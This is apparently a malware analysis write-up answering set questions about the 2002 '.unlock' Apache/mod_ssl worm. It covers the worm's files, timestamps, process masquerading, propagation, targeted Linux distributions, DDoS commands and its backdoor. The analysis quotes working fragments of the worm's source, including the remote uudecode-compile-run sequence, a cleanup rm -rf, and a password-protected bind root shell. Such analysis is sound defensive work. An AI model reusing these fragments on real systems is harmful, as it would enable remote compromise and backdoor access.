1. Which is the type of the .unlock file? When was it generated?
It is a gzipped tarball created on 9/20/2002 at 6:59:04.
file version 3.37 identified the original ".unlock" file as a gzipped file. After deflating the archive, file reported the resultant file was a tarball.
[ken@dali orig]$ file .unlock .unlock: gzip compressed data, deflated, last modified: Fri Sep 20 \ 06:59:04 2002, os: Unix [ken@dali orig]$ gunzip -c .unlock > unlock.decompressed [ken@dali orig]$ file unlock.decompressed unlock.decompressed: GNU tar archive2. Based on the source code, who is the author of this worm? When it was created? Is it compatible with the date from question 1?
According to the source code, ".unlock.c" was originally written by "contem@efnet", but modified by "aion@ukr.net". In .unlock.c on line 71 there is a define for 'VERSION' which says the program was finished on September 20th, 2002:
#define VERSION 20092002
According to the source code, ".update.c" was written by "aion@ukr.net".
Additionally, according to the stat utility, the files were last modified on 9/20/2002 and 9/19/2002 respectively:
[ken@dali scan25]$ stat .unlock.c File: ".unlock.c" Size: 70981 Blocks: 152 IO Block: 4096 Regular File Device: 303h/771d Inode: 505693 Links: 1 Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 10/ wheel) Access: Tue Nov 12 23:19:27 2002 Modify: Fri Sep 20 09:28:11 2002 Change: Tue Nov 12 23:19:27 2002 [ken@dali scan25]$ stat .update.c File: ".update.c" Size: 2792 Blocks: 8 IO Block: 4096 Regular File Device: 303h/771d Inode: 505694 Links: 1 Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 10/ wheel) Access: Tue Nov 12 23:19:27 2002 Modify: Thu Sep 19 17:57:48 2002 Change: Tue Nov 12 23:19:27 2002The file dates are compatible with when I believe the original tarball was created from question #1.
3. Which process name is used by the worm when it is running?
The ".unlock" executable will show up as running the process name "httpd ". The ".update" remote root shell will show as running the process named "update ".
Line 78 in ".unlock.c" creates a define, PSNAME, and sets the value to httpd:
#define PSNAME "httpd "
Line 1805 in ".unlock.c" sets the "argv[0]" parameter to PSNAME. "argv[0]" is the process name displayed when producing a process list through tools such as "ps":
strcpy(argv[0],PSNAME);
Line 8 in ".update.c" sets a define, PSNAME, of update:
#define PSNAME "update " // what copy to argv[0]
Line 35 in ".update.c" sets the "argv[0]" parameter to PSNAME:
strcpy(argv[0],PSNAME);
4. In which format the worm copies itself to the new infected machine? Which files are created in the whole process? After the worm executes itself, wich files remain on the infected machine?
The worm uuencodes itself and copies itself as a uuencoded file named "/tmp/.unlock.uu". This is done inside of the "sh" function beginning on line 1403 in ".unlock.c". The code creates the uuencoded file by calling "cat" on the attacked host, and then uuencoding the original ".unlock" tarball by calling the "encode" function (on line 1418).
Once the uuencoded worm is sent to the attacked host, it decrypts the file and creates the tarball, ".unlock". This is in line 1421 of the ".unlock.c" program.
By the time it is done, the worm creates the following files:
File | Description |
/tmp/.unlock.uu | uuencoded payload sent to infected host |
/tmp/.unlock | GNU zipped tarball with source files |
/tmp/.unlock.c | worm source code |
/tmp/httpd | worm source code once it has been compiled |
/tmp/.update.c | root shell backdoor source code |
/tmp/update | compiled backdoor program |
The sections of the source code which perform this task are between lines 1416 and 1424 in ".unlock.c":
writem(sockfd,"cat > /tmp/.unlock.uu << __eof__; \n"); zhdr(1); encode(sockfd); zhdr(0); writem(sockfd,"__eof__\n"); writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu; " "tar xzf /tmp/.unlock -C /tmp/; " "gcc -o /tmp/httpd /tmp/.unlock.c -lcrypto; " "gcc -o /tmp/update /tmp/.update.c;\n");The only file which remains on the infected system after the worm is running is "/tmp/.unlock". The rest of the files are removed from the infected system. This is done on lines 1427 and 1428 of the ".unlock.c" worm:
writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c " " /tmp/httpd /tmp/update; exit; \n");5. Which port is scanned by the worm?
The worm scans port 80, the standard httpd port.
Line 67 of ".unlock.c" defines "SCANPORT" as port 80:
#define SCANPORT 80
The actual scanning is done in the main subroutine of the program, within the SCAN conditional define. On line 1923 of ".unlock.c" is where the worm attempts to connect to a potential victem host:
atcp_sync_connect(&clients[n],srv,SCANPORT);
6. Which vulnerability the worm tries to exploit? In which architectures?
The worm exploits a vulnerability in the SSL protocol on vulnerable web-servers. It is specifically targeted at various linux distributions running the Apache web-server with mod_ssl on port 443.
The attack routine is in the subroutine "exploit" beginning on line 1697 and ending on line 1761 inside of ".unlock.c".
The list of vulnerable distributions with their matching versions of the apache web-server are as follows:
ID # | Distribution | Apache Version |
1 | Gentoo | all (non-specified) |
2 | Debian | 1.3.26 |
3 | Red-Hat | 1.3.6 |
4 | Red-Hat | 1.3.9 |
5 | Red-Hat | 1.3.12 |
6 | Red-Hat | 1.3.12 (another attack vector) |
7 | Red-Hat | 1.3.19 |
8 | Red-Hat | 1.3.20 |
9 | Red-Hat | 1.3.26 |
10 | Red-Hat | 1.3.23 |
11 | Red-Hat | 1.3.22 |
12 | SuSE | 1.3.12 |
13 | SuSE | 1.3.17 |
14 | SuSE | 1.3.19 |
15 | SuSE | 1.3.20 |
16 | SuSE | 1.3.23 |
17 | SuSE | 1.3.23 (another attack vector) |
18 | Mandrake | 1.3.14 |
19 | Mandrake | 1.3.19 |
20 | Mandrake | 1.3.20 |
21 | Mandrake | 1.3.23 |
22 | Slackware | 1.3.26 |
23 | Slackware | 1.3.26 (another attack vector) |
This information was gathered from the "architectures" constant beginning on line 1245 and ending on line 1268 in ".unlock.c".
7. What kind of information is sent by the worm by email? To which account?
The following things are emailed by the worm:
The email is sent in the 'mailme' function beginning on line 94, and ending on line 130 in ".unlock.c".
The 'mailme' function is called with the value of argv[1], which would be the first element of the command line passed to the worm. This is done on line 1802 of ".unlock.c".
When the worm is started, it is passed the ip address of the attacking machine as a command line parameter. This is done on line 1425 of the worm, in the 'sh' function, within ".unlock.c":
sprintf(rcv, "/tmp/httpd %s; /tmp/update; \n",localip);
8. Which port (and protocol) is used by the worm to communicate to other infected machines?
The infected machines use UDP on port 4156 to communicate to each other.
The port is defined on line 66 of the ".unlock.c" source code and the worm listens on that port on line 1781, and communicates with other hosts on lines 932 and 948 of the ".unlock.c" source code.
9. Name 3 functionalities built in the worm to attack other networks. The worm listens for commands to be sent to it on port 4156/udp. It can be used to intitiate the following distributed denial of service attacks (DDoS). The information can be retrieved in the ".unlock.c" source code:
Command Code | Attack type | Line #'s in source |
0x29 | udp flood a host | 2205-2245 |
0x2a | tcp flood a host | 2246-2277 |
0x2b | IPv6 TCP flood a host ** ONLY if the "NOIPV6" define is not set ** | 2279-2306 |
0x2c | DNS flood a host | 2308-2385 |
10. What is the purpose of the .update.c program? Which port does it use?
".update.c" creates an interactive root shell if someone connects to port 1052/tcp and provides the password "aion1981".
The port is defined on line 4, the password is on line 5, in ".update.c".
The code to provide the interactive root shell is between lines 58 and 67 in ".update.c":
if (!fork()) { dup2(soc_cli,0); dup2(soc_cli,1); dup2(soc_cli,2); read(soc_cli,temp_buff,10); if( !strncmp(temp_buff,PASS,strlen(PASS)) ) execl("/bin/sh","sh -i",(char *)0); closeall(); exit(0); } else wait(&retval);11. Bonus Question: What is the purpose of the SLEEPTIME and UPTIME values in the .update.c program?
The ".update.c" program opens a socket on port 1052/tcp for 10 seconds once every 5 minutes. If a person connects to the host and provides the correct password (from #10 above) during this 10 second window, they will be given an interactive root shell. If no one connects during the 10 second listen window, the host will stop answering requests for 5 minutes at which point the cycle will begin again.
"UPTIME" is set to 10 seconds, which is the time period the host will listen for a connection on 1052/tcp. This is in the for loop beginning on line 52, and ending on line 70:
for(stimer=time(NULL);(stimer+UPTIME)>time(NULL);) { soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, sizeof(client_addr)); if (soc_cli > 0) { if (!fork()) { dup2(soc_cli,0); dup2(soc_cli,1); dup2(soc_cli,2); read(soc_cli,temp_buff,10); if( !strncmp(temp_buff,PASS,strlen(PASS)) ) execl("/bin/sh","sh -i",(char *)0); closeall(); exit(0); } else wait(&retval); } sleep(1); }"SLEEPTIME" is set to 300 seconds, which is a 5 minute window in which the host is not accepting connections on 1052/tcp. This is done on line 73 of the program:
sleep(SLEEPTIME);
------ steps taken -------- [ken@dali scan25]$ md5sum .unlock a03b5be9264651ab30f2223592befb42 .unlock [ken@dali scan25]$ file .unlock .unlock: gzip compressed data, deflated, last modified: Fri Sep 20 06:59:04 2002, os: Unix [ken@dali scan25]$ tar tfvz .unlock -rw-r--r-- root/wheel 70981 2002-09-20 09:28:11 .unlock.c -rw-r--r-- root/wheel 2792 2002-09-19 17:57:48 .update.c [ken@dali scan25]$ su Password: [root@dali scan25]# tar xfv .unlock --atime-preserve --same-owner -p .unlock.c .update.c [root@dali scan25]# exit [ken@dali scan25]$ stat .unlock.c File: ".unlock.c" Size: 70981 Blocks: 152 IO Block: 4096 Regular File Device: 303h/771d Inode: 505693 Links: 1 Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 10/ wheel) Access: Tue Nov 12 23:19:27 2002 Modify: Fri Sep 20 09:28:11 2002 Change: Tue Nov 12 23:19:27 2002 [ken@dali scan25]$ stat .update.c File: ".update.c" Size: 2792 Blocks: 8 IO Block: 4096 Regular File Device: 303h/771d Inode: 505694 Links: 1 Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 10/ wheel) Access: Tue Nov 12 23:19:27 2002 Modify: Thu Sep 19 17:57:48 2002 Change: Tue Nov 12 23:19:27 2002 [ken@dali scan25]$ md5sum .unlock.c 08fd6e79eb5729c2c9f08e4aedba469c .unlock.c [ken@dali scan25]$ md5sum .update.c 9e299c76295b4a654e544bed35adb9f3 .update.c